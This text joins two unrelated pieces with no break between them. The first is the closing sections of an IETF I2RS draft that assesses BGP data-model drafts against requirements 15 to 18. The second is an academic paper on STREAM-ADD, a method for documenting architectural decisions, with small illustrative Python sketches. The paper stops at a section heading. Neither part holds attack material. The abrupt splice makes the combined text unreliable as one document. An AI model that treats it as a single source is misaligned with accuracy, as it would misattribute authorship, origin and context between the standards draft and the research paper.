5.15. BGP-REQ 15
BGP-REQ15 requirement is: the "I2RS client via the I2RS agent MUST have the ability to read the loc-RIB-In BGP table that gets all the routes that the CE has provided to a PE router."
Discussion: The [I-D.zhdankin-netmod-bgp-cfg] provides no indication of a local-rib or a local-RIB-in associated with a BGP peer. The [I-D.wang-i2rs-bgp-dm] provides a local-rib per AFI, and a local-RIB-IN (AdjRIBIn and AdjRIBOut) associated with each peer. The route table format is presented in figure bgp-9.
Conclusion: [I-D.wang-i2rs-bgp-dm] is necessary for this requirement.
5.16. BGP-REQ 16
BGP-REQ16 requirement is: the "I2RS client via the I2RS agent MUST have the ability to install destination based routes in the local RIB of the PE devices. This must include the ability to supply the destination prefix (NLRI), a table identifier, a route preference, a
route metric, a next-hop tunnel through which traffic would be carried."
Discussion: If this refers to the I2RS LOC-rib, then both drafts have policy which could redistribute I2RS routes.
If BGP-REQ 16 instead refers to a BGP local-rib per AFI and the bgp-peer based bgp-rib-in (AdjRibIn) and bgp-rib-out (AdjRibOut), then, as the previous discussion indicates, [I-D.zhdankin-netmod-bgp-cfg] does not have a local rib-in.
The document [I-D.wang-i2rs-bgp-dm] describes a per AFI bgp local-rib and the per peer bgp-rib-in (AdjRIBIn) and bgp-rib-out (AdjRibOut). The routes in these RIBs fall under a table identifier structure and have a destination prefix (NLRI), route administrative preference, route local-reference, and a next-hop. However, [I-D.wang-i2rs-bgp-dm] does not have a tunnel based definition for the next-hop. This would need to be added.
Conclusion: Additions to [I-D.wang-i2rs-bgp-dm] may need to be made to fulfill this requirement.
5.17. BGP-REQ 17
BGP-REQ17 requirement is: the "I2RS client via the I2RS agent SHOULD have the ability to read the loc-RIB-in BGP table to discover overlapping routes, and determine which may be safely marked for removal."
Discussion: As discussed in BGP-REQ15 and BGP-REQ16, draft [I-D.zhdankin-netmod-bgp-cfg] does not have a local-RIB-In BGP table. [I-D.wang-i2rs-bgp-dm] has a BGP local-rib per AFI and a per BGP Peer bgp-rib-in. As described in BGP-REQ10, each route may set a "remove overlapping route" status flag.
Conclusion: [I-D.wang-i2rs-bgp-dm] supports BGP-REQ 17.
5.18. BGP-REQ 18
BGP-REQ18 requirement is the "I2RS client via the I2RS Agent SHOULD have the ability to modify filtering rules and initiate a re-computation of the local BGP table through those policies to cause specific routes to be marked for removal at the outbound eBGP edge."
Discussion: This feature requires that I2RS should be able to do a re-computation of policies. This re-computation of policies is part of a soft-reconfig which [I-D.zhdankin-netmod-bgp-cfg] allows by
configuration. However, the I2RS client will need a parameter to be set to do a reconfigure.
Neither [I-D.zhdankin-netmod-bgp-cfg] nor [I-D.wang-i2rs-bgp-dm] has this feature.
Conclusion: This feature needs to be added to the final model.
6. IANA Considerations
This draft includes no request to IANA.
7. Security Considerations
TBD
8. Informative References
[I-D.bogdanovic-netmod-acl-model]
[I-D.hares-i2rs-bgp-dm]
[I-D.hares-i2rs-info-model-service-topo]
[I-D.hares-i2rs-usecase-reqs-summary]
Hares, S., "Summary of I2RS Use Case Requirements", draft-hares-i2rs-usecase-reqs-summary-00 (work in progress), July 2014.
[I-D.ietf-i2rs-architecture]
[I-D.ietf-i2rs-rib-info-model]
[I-D.wang-i2rs-bgp-dm]
[I-D.zhdankin-netmod-bgp-cfg]
Author’s Address
Susan Hares
Huawei
7453 Hickory Hill
Saline, MI 48176
USA
Email: shares@ndzh.com
STREAM-ADD – Supporting the Documentation of Architectural Design Decisions in an Architecture Derivation Process
Diego Dermeval¹, João Pimentel¹, Carla Silva¹, Jaelson Castro¹, Emanuel Santos¹, Gabriela Guedes¹
¹Centro de Informática, Universidade Federal de Pernambuco – UFPE
{ddcm,jhcp,ctlls,jbc,eb,sg}@cin.ufpe.br
Márcia Lucena², Anthony Finkelstein³
²Departamento de Informática e Matemática Aplicada, Universidade Federal do Rio Grande do Norte – UFRN
marciaj@dimap.ufrn.br
³Department of Computer Science, University College London – UCL
a.finkelstein@ucl.ac.uk
Abstract – Requirements Engineering and Architectural Design are activities of the software development process that are strongly related and intertwined. Thus, providing effective methods of integration between requirements and architecture is an important Software Engineering challenge. In this context, the STREAM process presents a model-driven approach to generate early software architecture models from requirements models. Despite being a systematic derivation approach, STREAM does not support the documentation of architectural decisions and their corresponding rationale. Recent studies in the software architecture community have stressed the need to treat architectural design decisions and their rationale as first class citizens in software architecture specification. In this paper we define an extension of this process, named STREAM-ADD (Strategy for Transition between Requirements and Architectural Models with Architectural Decisions Documentation). This extended process aims to systematize the documentation of architectural decisions at the time they are made and to support the refinement of the architecture according to such decisions. To illustrate our approach, we applied it to create the architecture specification of a route-planning system.
Keywords – Requirements Engineering; Software Architecture; Architectural Decisions; Software Architecture Documentation; Architectural Knowledge
I. INTRODUCTION
Requirements Engineering (RE) and Architectural Design are initial activities of the software development process that are strongly related and overlap [1]. In this context, some efforts have been made to understand the integration between these activities [2, 3, 4]. More specifically, some works present systematic methods to design software architecture from goal-oriented RE approaches [5, 6, 7, 8]. In particular, the STREAM (Strategy for Transition between REquirements and Architectural Models) process [8] presents a model-driven approach for generating initial architectures - in Acme [9] - from i* requirements models [10]. It consists of the following steps: (i) Requirements Refactoring, (ii) Generate Architectural Model and (iii) Refine Architecture. Horizontal and vertical model-transformation rules were proposed to aid steps (i) and (ii), respectively. Lastly, in step (iii) the architecture is refined by using architectural styles.
The architecture obtained from the STREAM process is represented in Acme using components and connectors. However, this representation is not sufficient. According to [11], software architecture must be sufficiently abstract to be quickly understood by new staff, concrete enough to serve as a blueprint for the development team and should contain sufficient information to serve as a basis for system analysis.
Moreover, recent studies have emphasized the need to treat architectural design decisions and their rationale as first class citizens in the software architecture specification [12, 13, 14]. Thus, it is necessary to include activities for documenting, capturing and managing architectural decisions in the architectural design process. In fact, performing these activities implies an extra effort, which can be compensated by benefits obtained later in the software development process [11]. For example, traceability between requirements models and architectural models is produced during the software life cycle [14]. Traceability along with (architectural decision-making) rationale documentation enables estimating more precisely the impact of changes in requirements or architecture and decreasing the costs of software maintenance [15]. Besides, documenting the rationale associated with the architectural decision-making process aids the communication between the stakeholders and serves as an auxiliary memory for the architect [14].
Given the potential benefits of documenting architectural design decisions, we propose the STREAM-ADD (Strategy for Transition between Requirements and Architectural Models with Architectural Decisions Documentation) process, an extension of the STREAM process to guide the documentation of architectural decisions and the refinement of the architectural model according to the decisions taken.
The remainder of this paper is organized as follows. Section II briefly describes our running example, the BTW route-planning system, along with the main concepts of i* language. Section III gives an overview of our approach. Section IV describes the activities of the STREAM-ADD process, applying them to the running
example. Section V discusses related work. Finally, Section VI summarizes our work, presents our conclusions and points out future work.
II. RUNNING EXAMPLE
This section briefly describes the BTW (By The Way) system, which is going to be used to illustrate our approach. The BTW system [16] is a route-planning system that helps users define a specific route based on advice given by other users. This information might be filtered to provide only relevant information about the place that a user intends to visit.
Fig. 1 presents an excerpt of the requirements model of the BTW system, represented with the i* notation [10]. Using i*, we can describe both the system and its environment in terms of intentional dependencies among actors. In a dependency, an actor, called a depender, requires a dependum that can be provided by an actor, called dependee. The dependum may be a goal, a softgoal, a task or a resource. Goals represent the intentions, needs or objectives of an actor. Softgoals are objectives of subjective nature – they are generally used to express non-functional requirements. The tasks represent a way to perform some action to obtain the satisfaction of a goal or a softgoal. The resources denote data, information or a physical resource that an actor may provide or receive.
In Fig. 1 there is an actor which represents the software system to be developed (BTW), actors illustrative of human agents (Travelers, that can be Advice Giver and Advice Receiver), and an actor on behalf of an external system (Internet Provider). The software system actor (BTW) is also refined in the SR (Strategic Rationale) model by exploiting its internal details to describe how the dependencies are accomplished. For the sake of space, the SR model of BTW system is suppressed in this paper; however it can be seen in [8].
III. STREAM-ADD OVERVIEW
The goal of the original STREAM process is to generate architectural models, in Acme, from requirements models in i*, by using model transformations [8]. That process has an activity focused on the refinement of architectural models by the application of architectural styles and architectural refinement patterns. However, this activity is not entirely systematized and does not allow the documentation of the rationale involved in the decision-making performed during the architectural design refinement.
To overcome this limitation, we have defined the STREAM-ADD process, an extension of the STREAM process with richer support for making and documenting architectural decisions. The three activities of this new process are depicted in Fig. 2. The first two activities, Requirements Refactoring and Generate Architectural Model, were maintained as-is from the original STREAM [8]. The last activity (Refine Architectural Model With Architectural Decisions) has been extended to support the documentation of architectural decisions and to make the architectural refinement more systematic.
The Requirements Refactoring activity is concerned with the modularization of the i* model. It is a first step towards identifying the system’s components. To achieve this, a set of model transformation rules is applied [17]. During the Generate Architectural Model activity the requirements model is mapped onto components and connectors of an early architectural model, also based on a set of model transformation rules.
Before presenting the last activity, we apply the first two activities to our running example, the BTW system. The Requirements Refactoring activity relies on a decomposition criterion based on the separation and modularization of elements or concerns that are not strongly related to the application domain. Fig. 1 illustrates the i* model for the BTW system obtained as a result of this activity. The highlighted elements in Fig. 1 represent new system actors, which are linked to the BTW itself.
During the Generate Architectural Model activity, transformation rules are used to translate the modular i* model (Fig. 1) onto an early architecture model in Acme [8]. The main elements of Acme are components, connectors, ports, roles, and representations. Acme components represent computational units of a system. Connectors represent and mediate interactions between components. Ports correspond to external interfaces of components. Roles represent external interfaces of connectors. Thus, ports and roles are points of interaction,
respectively, between components and connectors. Representations allow a component, connector, port, or role to describe its design in detail by specifying a sub-architecture that refines the parent element.
The transformation rules provided in this activity define the mapping from $i^*$ actors to Acme components, and from $i^*$ dependencies to Acme connectors and ports. Applying this mapping to our running example (Fig. 1), seven components are generated: BTW system (the main actor); User Access Controller, Map Information Publisher and Mapping Handler (actors not related to the application domain); Advice Giver, Advice Receiver and Internet Provider. Fig. 3 shows the early architectural model mapped from the $i^*$ model. More details about the systematic application of these activities can be found in [8].
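The actor-to-component and dependency-to-connector mapping just described can be sketched as follows. This is a simplification of the STREAM transformation rules using our own data structures, not Acme syntax or the actual STREAM tooling.

```python
# Minimal sketch (our own shapes) of the vertical mapping: i* actors
# become components, and each i* dependency (depender, dependum,
# dependee) becomes a connector whose roles attach to ports on the two
# participating components.

def derive_architecture(actors, dependencies):
    components = {a: {"ports": []} for a in actors}
    connectors = []
    for depender, dependum, dependee in dependencies:
        for actor in (depender, dependee):
            components[actor]["ports"].append(dependum)
        connectors.append({"name": dependum,
                           "roles": [depender, dependee]})
    return components, connectors

actors = ["BTW", "Advice Giver", "Advice Receiver"]
deps = [("Advice Giver", "Advice", "BTW"),
        ("BTW", "Route Plan", "Advice Receiver")]
comps, conns = derive_architecture(actors, deps)
print(len(comps), len(conns))  # 3 components, 2 connectors
```

Applied to the full refactored model of Fig. 1, this style of mapping yields the seven components listed above.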
Figure 3. The result of mapping the BTW system model from $i^*$ to Acme
In the following section we will focus on the Refine Architecture With Architectural Decisions sub-process, since it is the novel contribution of this present work.
**IV. STREAM-ADD – ARCHITECTURAL MODEL REFINEMENT**
The Refine Architectural Model With Architectural Decisions sub-process aims to refine the early architectural model, mapped from the $i^*$ model, by making and documenting architectural decisions. To do so, we designed a template (based on [12][13][18]) that relates the requirements ($i^*$) and architecture (Acme) models used in the process. The defined template contains the following fields: Requirements, Stakeholders, Non-Functional Requirements, Alternative solutions, Rationale, Decision, Design Fragment, Group, Status, Related artifacts, Phase/Iteration, Consequences, and Dependencies. This template will be used to document architectural decisions made during this sub-process.
Moreover, to define the activities of this sub-process, we analyzed a classification scheme of architectural decisions presented in [13]. Our sub-process supports Existence Decisions related to structural aspects and Executive Decisions related to technology aspects.
Hereafter, we briefly describe each of these architectural decisions types used in the STREAM-ADD process.
Existence Decisions state that some element/artifact will positively be included in the architecture. This concerns both structural and behavioral decisions. Structural decisions lead to the creation of subsystems, layers, partitions and components in some view of the architecture. Behavioral decisions are related to how the elements interact together to provide functionality or to satisfy some non-functional requirement. Executive Decisions do not relate directly to the design elements or their qualities, but are essentially driven by the business environment, and affect the development process, the people, the organization, and to a large extent the choices of technologies and tools, e.g., the programming language to be used.
Fig. 4 presents the activities that constitute the Refine Architectural Model With Architectural Decisions sub-process. It is worth noting that we do not intend to guide architectural decision-making in this process, but rather to guide the documentation of these decisions, at the moment they are made, using a specific template. Fig. 5 will show the refinement of the BTW early architectural model after making and documenting one structural and one technology decision.
Figure 4. The Refine Architectural Model With Architectural Decisions sub-process
**A. Structural Decisions Documentation**
We consider as structural the following types of decisions: (i) architectural style application; (ii) refinement pattern application to specific non-functional requirements [5]; and (iii) component decomposition. The inputs of this activity are the modular $i^*$ model, the early architectural model, the documentation template and a NFRs list. This activity will be illustrated with an architectural style decision in the BTW system.
In the following we describe a set of steps that must be performed to fill the documentation template for each architectural decision made for a system. For the sake of space, here we are going to focus only on the architectural style decision.
1) **Identify Requirements and Stakeholders Addressed by the Decision**
In this step, the requirements and stakeholders related to a decision are identified and documented in the template – the former in the Requirements and NFRs
fields, the latter in the Stakeholders field. The Requirements field captures intentional elements of i* models, i.e., goals, tasks, resources and softgoals that influence the current decision-making. The Stakeholders field captures the stakeholders interested in these requirements. They may be actors in the i* model that have dependency links with the identified requirements or actors from the organization that is developing the system, e.g., project manager, client, quality assurance staff, and so on.
In addition, considering the three types of NFRs – Product NFRs, External NFRs and Process NFRs [19] – the first type refers to NFRs that are essentially quality attributes of a product (e.g. performance). Thus, in this paper we consider that Product NFRs and softgoals are semantically equivalent. The second and third types influence architectural alternatives to consider during the decision-making process (e.g. use Free/Libre and Open Source Software technologies). However, these two NFR types are not usually represented in i* models. Hence, the External and Process NFRs are recorded in NFR field of the documentation template, as shown in the next step.
Table I – BTW system NFRs list
<table>
<thead>
<tr>
<th>Softgoals</th>
<th>Other NFRs</th>
</tr>
</thead>
<tbody>
<tr>
<td>Usability, Performance, Security; Recommendation Relevance; Precise Advices.</td>
<td>Minimize Costs; Minimize Development Time; Maximize Mashup Engineering.</td>
</tr>
</tbody>
</table>
Table I illustrates the list of NFRs for our running example. This list is an input of the Structural Decisions Documentation activity. Softgoals were captured from the i* model (Fig. 1) and NFRs were identified from other artifacts of the BTW system, especially the project plan [16]. Since we are considering an architectural style decision, and Product NFRs (softgoals) affect the software architecture globally [7], the Requirements field of the template (Table II) is filled with all softgoals presented in Table I. The Stakeholders field of the template is filled with a non-software actor present in Fig. 1 that has some dependency with these softgoals – in this case, the Traveller actor. The “NFRs” field is empty because the system’s NFRs were found not to affect the architectural style decision.
2) Identify Architectural Alternatives
This step is concerned with considering possible architectural alternatives to address the captured requirements. These alternative solutions will be recorded in the Alternatives field of the documentation template. For the case of identifying a suitable set of alternatives for deciding which architectural style to apply, we suggest consulting architectural style catalogues (such as [20]). By analyzing such catalogues, we identified two possible styles that could be applied to the early architectural model of the BTW system (Fig. 3): Model-View-Controller and Layers. Thus, the Alternatives field of the template documenting this decision is filled with these architectural alternatives (Table II).
Table II – Documentation Template for the Apply Layers Architectural Style Architectural Decision
3) Perform Contribution Analysis of Alternatives
In this step, a contribution analysis is performed, based on [21]. The identified alternatives may contribute (negatively or positively) to the fulfillment of the softgoals and the NFRs documented in the template. Contributions are represented by a link whose source is an architectural alternative and whose target is a softgoal or an NFR. Each link has a label expressing the kind of contribution from the source to the target element: help (positive contribution), hurt (negative contribution) or unknown (neutral contribution).
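These labelled links can be captured in a small data structure. The following minimal Python sketch is illustrative only; the class and constant names are not part of the STREAM-ADD notation:

```python
from dataclasses import dataclass

# The three contribution labels described in the text.
HELP, HURT, UNKNOWN = "help", "hurt", "unknown"

@dataclass(frozen=True)
class Contribution:
    """A labelled link from an architectural alternative (source)
    to a softgoal or NFR (target)."""
    alternative: str
    target: str
    label: str  # one of HELP, HURT, UNKNOWN

# Contributions of the Layers style in the BTW running example.
layers_links = [
    Contribution("Apply Layers Style", "Performance", UNKNOWN),
    Contribution("Apply Layers Style", "Usability", UNKNOWN),
    Contribution("Apply Layers Style", "Security", HELP),
]
```

Under this view, the rationale model of a decision is simply the set of such links for every alternative being considered.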
The contribution analysis performed in this step for our running example was aided by the catalog presented in [20]. By consulting this catalog we have identified that, in general, the layer architectural style has neutral impact on Performance and Usability, and positive impact on Security. Additionally, we considered that the layer architectural style does not impact the Precise Advices and Recommendation Relevance softgoals. Therefore, this alternative has a neutral impact on these softgoals.
With respect to the MVC architectural style, the catalog indicates that this style has a positive impact on the Usability softgoal and a neutral contribution to the Performance and Security softgoals. The contributions to
Precise Advices and Recommendation Relevance
softgoals are also neutral for this architectural alternative.
Last but not least, architectural alternatives can also impact NFRs. Since there are no NFRs involved in this decision, there is no contribution from the alternatives to NFRs. The model capturing the contributions of the architectural style alternatives to the satisfaction of softgoals/NFRs is illustrated in the Rationale field of the documentation template (Table II). This model will be modified in the next step, by adding prioritization information.
4) Perform Trade-off Analysis of Alternatives
After performing the contribution analysis, the software architect must identify the priority of each softgoal/NFR involved in the analysis. High-priority elements are marked with exclamation marks [21]. Then, the architect must perform a trade-off analysis of the alternatives and choose the one that best fulfills the set of softgoals and NFRs as a whole. The trade-off analysis should focus on maximizing the satisfaction of the softgoals and NFRs with higher priority. A reasoning mechanism, such as the one presented in [21], can also be used to identify the most suitable architectural alternative.
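One simple way to mechanize such a trade-off analysis is to map the qualitative labels onto scores and weight high-priority elements more heavily. The sketch below is illustrative only; STREAM-ADD itself relies on the qualitative reasoning of [21], not on numeric scores:

```python
# Numeric stand-ins for the qualitative contribution labels
# (illustrative only; the paper's analysis stays qualitative).
LABEL_SCORE = {"help": 1, "unknown": 0, "hurt": -1}

def score(contributions, priorities):
    """Score one alternative; high-priority softgoals/NFRs weigh double."""
    return sum((2 if target in priorities else 1) * LABEL_SCORE[label]
               for target, label in contributions.items())

# BTW example: Performance and Security have the highest priority.
priorities = {"Performance", "Security"}
alternatives = {
    "Apply Layers Style": {"Performance": "unknown", "Security": "help",
                           "Usability": "unknown"},
    "Apply MVC Style": {"Performance": "unknown", "Security": "unknown",
                        "Usability": "help"},
}
chosen = max(alternatives, key=lambda a: score(alternatives[a], priorities))
print(chosen)  # the Layers style wins, matching Table II
```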
Once the architectural alternative has been chosen, it should be inserted in the Decision field of the documentation template. Besides that, the model in the Rationale field of the template must be updated with the prioritization information.
In the BTW system, the softgoals with the highest priority are Performance and Security. Analyzing the contributions of the architectural alternatives, we can see that the Apply Layers Architectural Style alternative contributes neutrally to the Performance softgoal and positively to the Security softgoal. On the other hand, the Apply MVC Architectural Style alternative contributes positively to the Usability softgoal. Thus, as the Performance and Security softgoals have higher priority than the Usability softgoal, the selected alternative is Apply Layers Architectural Style (documented in the Decision field of Table II).
5) Specify Architectural Decision Design Fragment
Once the architectural alternative has been selected and documented in the template, the architect must specify a design fragment associated with the architectural decision. A design fragment is composed of architectural elements in Acme, to be incorporated into the early architectural model during the Architectural Refinement With Structural Decisions activity.
A design fragment has different characteristics, depending on the type of the structural architectural decision. An architectural style application usually has a global impact on the software architecture [7]. Thus, a design fragment produced by an architectural style application decision may modify the architecture as a whole, or a large part of it. Accordingly, an architectural style design fragment should be composed of a high-level architectural configuration representing the structure of the selected architectural style.
To specify the design fragment associated with the architectural style of BTW, we used the guidelines proposed in [8] to define a three-layer design fragment, whose layers are: Interface, Business and Services. This fragment illustrates how the layers are interconnected (Table II). Each layer is modeled as an Acme representation, enabling the insertion of other architectural elements into it.
It is important to note that the fragment specified in this step is going to be incorporated to the early architectural model in the Architectural Refinement with Structural Decisions activity (Section B).
6) Fill Additional Information
The last step for the documentation of an architectural decision is to fill in the additional information in the documentation template. It includes: (i) Group – information about the type of architectural decision; (ii) Status – the status of the architectural decision (rejected, approved, and so on [13]); (iii) Related Artifacts – the artifacts related to the documented decision; (iv) Phase/Iteration – the phase or iteration in which the architectural decision was made; (v) Dependencies – the dependencies between new architectural decisions and decisions already made. The identification of decision dependencies can be aided by the work presented in [13].
Applying this step to the BTW system, the Group field is filled with the type of the decision made, that is, Architectural Style Application. The Status field is filled with the attribute APPROVED to indicate that this decision has been accepted. The Related Artifacts field is filled with the names of the requirements model and the early architectural model of the BTW system. The Phase/Iteration field is filled with the “Architectural Design” phase. Finally, no consequences or dependencies were identified for this decision, so the Consequences and Dependencies fields of the documentation template are empty. The complete structural architectural documentation template of the Apply Layers Architectural Style decision is presented in Table II.
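The filled template can be rendered as a simple record. Below is a hypothetical Python sketch, with values condensed from Table II; the field names mirror the template but are not an official schema:

```python
from dataclasses import dataclass, field

@dataclass
class DecisionTemplate:
    """Hypothetical rendering of the documentation template fields."""
    # Fields filled during steps 1-5.
    requirements: list = field(default_factory=list)
    stakeholders: list = field(default_factory=list)
    nfrs: list = field(default_factory=list)
    alternatives: list = field(default_factory=list)
    rationale: str = ""       # contribution/trade-off model
    decision: str = ""
    design_fragment: str = ""
    # Additional information filled in step 6.
    group: str = ""
    status: str = ""
    related_artifacts: list = field(default_factory=list)
    phase_iteration: str = ""
    consequences: str = ""
    dependencies: list = field(default_factory=list)

# Table II condensed: the Apply Layers Architectural Style decision.
layers_decision = DecisionTemplate(
    requirements=["Usability", "Performance", "Security",
                  "Recommendation Relevance", "Precise Advices"],
    stakeholders=["Traveller"],
    alternatives=["Apply Layers Style", "Apply MVC Style"],
    decision="Apply Layers Style",
    group="Architectural Style Application",
    status="APPROVED",
    related_artifacts=["BTW requirements model",
                       "BTW early architectural model"],
    phase_iteration="Architectural Design",
)
```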
B. Architectural Refinement With Structural Decisions
In this activity, all structural architectural decisions made in the previous activity are used to refine the early architectural model derived from the i* model. This activity receives as input a set of documented structural architectural decisions and the early architectural model of the system. The architectural refinement occurs by applying the design fragments of the structural decisions to the early architectural model.
There is no predefined order to refine the architectural model using the structural decisions design fragments documented in the decisions made. Nevertheless, we propose two general guidelines that might help the selection of an appropriate sequence for the architectural refinement:
**Guideline 1.** The architectural style decisions should have the highest priority in the architectural refinement sequence. This guideline is motivated by the idea that, in general, architectural styles affect the system architecture in a global way [7].
**Guideline 2.** Architectural decision design fragments whose architectural configuration is more complex should have higher priority. The complexity of the fragments may be measured according to the number of Acme components, representations and connectors.
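Taken together, the guidelines induce a refinement order: style decisions first (Guideline 1), then decreasing fragment complexity (Guideline 2). A sketch follows, with hypothetical element counts for the BTW decisions:

```python
def refinement_order(decisions):
    """Order decisions per Guidelines 1 and 2: architectural-style
    decisions first, then by decreasing fragment complexity
    (components + representations + connectors)."""
    def sort_key(d):
        complexity = d["components"] + d["representations"] + d["connectors"]
        return (0 if d["is_style"] else 1, -complexity)
    return sorted(decisions, key=sort_key)

# Hypothetical counts; the real numbers come from the Acme fragments.
decisions = [
    {"name": "Use Google Maps", "is_style": False,
     "components": 3, "representations": 0, "connectors": 2},
    {"name": "Apply Layers Style", "is_style": True,
     "components": 3, "representations": 3, "connectors": 2},
]
order = [d["name"] for d in refinement_order(decisions)]
print(order)  # the style decision comes first
```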
After establishing a refinement sequence for the architectural decisions, for each structural decision, the architect must analyze its design fragment, identify the architectural model elements affected by the fragment and perform the refinement. It is important to note that the refinement of architectural models is incremental: each decision is applied to the architectural model that resulted from applying the previous decision.
In our running example, the early architectural model of the BTW system (Fig. 3) is refined with the Apply Layers Architectural style (Table II). The architecture represented in Fig. 5 is the BTW architectural model refined with this architectural decision. For the moment ignore the blue dashed (Google Maps) component as it is the result of an activity to be explained below. This refinement was made based on a set of guidelines proposed in [8]. Hence, each component was mapped as follows: (i) Advice Giver and Advice Receiver components were mapped to the “Interface” layer; (ii) Internet Provider and Map Info Publisher components were included in the “Services” layer, and; (iii) BTW, User Access Controller, Mapping Handler and Internet Business components were mapped to the “Business” layer. Therefore, in order to respect the strict definition of the Layers pattern, Internet Business component is introduced in the middle layer to provide internet services to the top layer.
**C. Technology Decisions Documentation**
Similarly to structural decisions, technology decisions need to be documented. Technology decisions should not contain specific details about implementation, but rather decisions that affect the architecture globally or specify how particular structural aspects must be implemented [11]. This is the main reason why technology architectural decision-making usually occurs after structural architectural decision-making. In addition, technology architectural decisions also limit the technologies used when implementing the system [13]. Technology decisions may be related to programming languages, specific frameworks or APIs (Application Programming Interfaces), component reuse, database management systems and so on.
The inputs to this activity are: the modular i* model (Fig. 1), the architectural model refined with structural decisions in the previous activity (Fig. 5), the system NFRs list (Table I) and the decisions documentation template.

In order to fill the documentation template with technology decisions, we rely on the same steps presented in the Structural Architectural Decisions activity, but with some variations. Given the similarities, we will focus on the application of these steps in a decision related to the selection of a technology for maps visualization and interaction to be used in the BTW system.
1) **Identify Requirements and Stakeholders Addressed by the Decision**
In order to illustrate this activity, we are going to consider the decision made in our running example to determine which maps visualization and interaction technologies available are more appropriate to be used in the BTW system.
The Information Be Published in Map goal, present in the i* model, is affected by this technology decision, as well as the Usability softgoal. In this sense, the Requirements field of this decision documentation template (Table III) is filled with these requirements.
Regarding the Stakeholders field, as the Traveller actor has a dependency relationship with Usability softgoal, it is inserted in this field of the documentation template. By analyzing Table I, we have identified that all NFRs are affected by the considered architectural alternatives. This way, the NFRs field of Table III is filled with Minimize Costs, Minimize Development Time and Maximize Mashup Engineering.
2) Identify Architectural Alternatives
In order to illustrate this step for a technology decision, we considered possible alternatives for the maps visualization and interaction technology of the BTW system. The available technologies identified to handle the visualization of and interaction with maps are: Use Google Maps, Use Bing Maps and Implement Own Maps Solution. These alternatives were included in the Alternatives field of the documentation template presented in Table III.
Table III – Documentation Template for the Use Google Maps Decision
<table>
<tbody>
<tr>
<td>Requirements</td>
<td>Information Be Published in Map; Usability</td>
</tr>
<tr>
<td>Stakeholders</td>
<td>Travellers</td>
</tr>
<tr>
<td>NFRs</td>
<td>Minimize Costs, Minimize Development Time, Maximize Mashup Engineering</td>
</tr>
<tr>
<td>Alternatives</td>
<td>Use Google Maps; Use Bing Maps; Implement Own Maps Solution</td>
</tr>
</tbody>
</table>
3) Perform Contribution Analysis of Alternatives
At this point, we analyze the contributions from the alternatives to the satisfaction of the softgoals and NFRs identified in the previous steps. The Use Google Maps alternative contributes positively to the Minimize Costs NFR because it is a free solution. This alternative also contributes positively to the Minimize Development Time NFR, because it is already implemented and well documented, and to the Maximize Mashup Engineering NFR, since it is a service available online. Moreover, Google Maps provides an intuitive and easy-to-use graphical user interface; hence it contributes positively to the Usability softgoal.
Regarding the Use Bing Maps alternative, it contributes positively to the Minimize Costs NFR, because it is also a free solution, but it has a neutral impact on the Minimize Development Time NFR, because its documentation is not satisfactory. Moreover, this alternative contributes positively to the Maximize Mashup Engineering NFR, because it is available as an online service as well, and it also provides an intuitive and friendly graphical user interface, so that it contributes positively to the Usability softgoal. Finally, the Implement Own Maps Solution alternative contributes negatively to the Minimize Costs NFR, since it requires time and people for its development. It also contributes negatively to the Minimize Development Time NFR, because it needs to be implemented from scratch, and to the Maximize Mashup Engineering NFR, because it does not use online services. Moreover, it has an unknown impact on the Usability softgoal, since its usability can only be evaluated after its development starts. Please note that in the Rationale field of Table III, NFRs and alternatives are both graphically represented as clouds; however, architectural alternatives are represented as clouds with a thicker border.
4) Perform Trade-off Analysis of Alternatives
This step is concerned with choosing the most suitable alternative regarding the fulfillment of softgoals and NFRs. To do this, it is required to define the priorities of the softgoals and NFRs. In our running example, the Usability softgoal and the Minimize Development Time NFR have the highest priority. Observing the model presented in the Rationale field of Table III, we conclude that the Implement Own Maps Solution alternative is dismissed because it does not contribute positively to any of the NFRs/softgoals. We also can see that the Use Google Maps alternative contributes positively to the Minimize Development Time NFR, whereas the Use Bing Maps alternative contributes neutrally to the same NFR. Regarding the Usability softgoal, both remaining alternatives have a positive impact on its fulfillment. Thus, we conclude that Use Google Maps is the most suitable alternative; it is included in the Decision field of the template presented in Table III, and the model used to perform this analysis is updated in the Rationale field.
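This eliminate-then-compare reasoning can be sketched programmatically. The sketch below is illustrative only; the labels reproduce the contribution analysis of the previous step:

```python
def choose(alternatives, priorities):
    """Dismiss alternatives with no positive contribution at all,
    then pick the one helping the most high-priority targets."""
    viable = {name: links for name, links in alternatives.items()
              if "help" in links.values()}
    return max(viable, key=lambda name: sum(
        1 for target, label in viable[name].items()
        if label == "help" and target in priorities))

alternatives = {
    "Use Google Maps": {
        "Minimize Costs": "help", "Minimize Development Time": "help",
        "Maximize Mashup Engineering": "help", "Usability": "help"},
    "Use Bing Maps": {
        "Minimize Costs": "help", "Minimize Development Time": "unknown",
        "Maximize Mashup Engineering": "help", "Usability": "help"},
    "Implement Own Maps Solution": {
        "Minimize Costs": "hurt", "Minimize Development Time": "hurt",
        "Maximize Mashup Engineering": "hurt", "Usability": "unknown"},
}
priorities = {"Usability", "Minimize Development Time"}
print(choose(alternatives, priorities))  # "Use Google Maps", as in Table III
```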
5) Specify Architectural Decision Design Fragment
In this step, the design fragment associated with the selected architectural alternative is specified. In general, an architect needs to analyze whether an architectural decision produces a design fragment that can affect or modify the structure of the software architecture. However, depending on the type of technology decision, a design fragment can be produced in different ways, or even not be produced at all. Therefore, we do not propose general guidelines in this step to aid the specification of design fragments. Instead, the architect is in charge of specifying the design fragment according to each architectural decision made.
The design fragment produced for the \textit{Use Google Maps} decision is presented in the \textit{Design Fragment} field of the documentation template (Table III). This fragment is composed of an architectural configuration that shows how the \textit{Mapping Handler} and \textit{Map Info Publisher} components of the BTW system (previously responsible for addressing the requirements affected by this decision) use the services of the \textit{Google Maps} component.
6) \textit{Fill Additional Information}
Finally, in this step, the additional information regarding the technology decision made is filled in the documentation template. Thus, the \textit{Group} field is filled with the requirements group addressed by this architectural decision: \textit{Maps Visualization and Interaction Services}. The \textit{Status} field is filled with the \textit{APPROVED} attribute. The \textit{Related Artifacts} field is filled with the project artifacts involved in this decision: \textit{BTW modular i* model} and \textit{BTW Acme model refined with structural decisions}. The \textit{Phase/Iteration} field is filled with \textit{Architectural Design}. Regarding the \textit{Consequences} field, the decision taken implies that software developers have to learn how to use \textit{Google Maps} services. Finally, no dependencies between this decision and others were identified, so the \textit{Dependencies} field is empty.
D. \textit{Architecture Refinement With Technology Decisions}
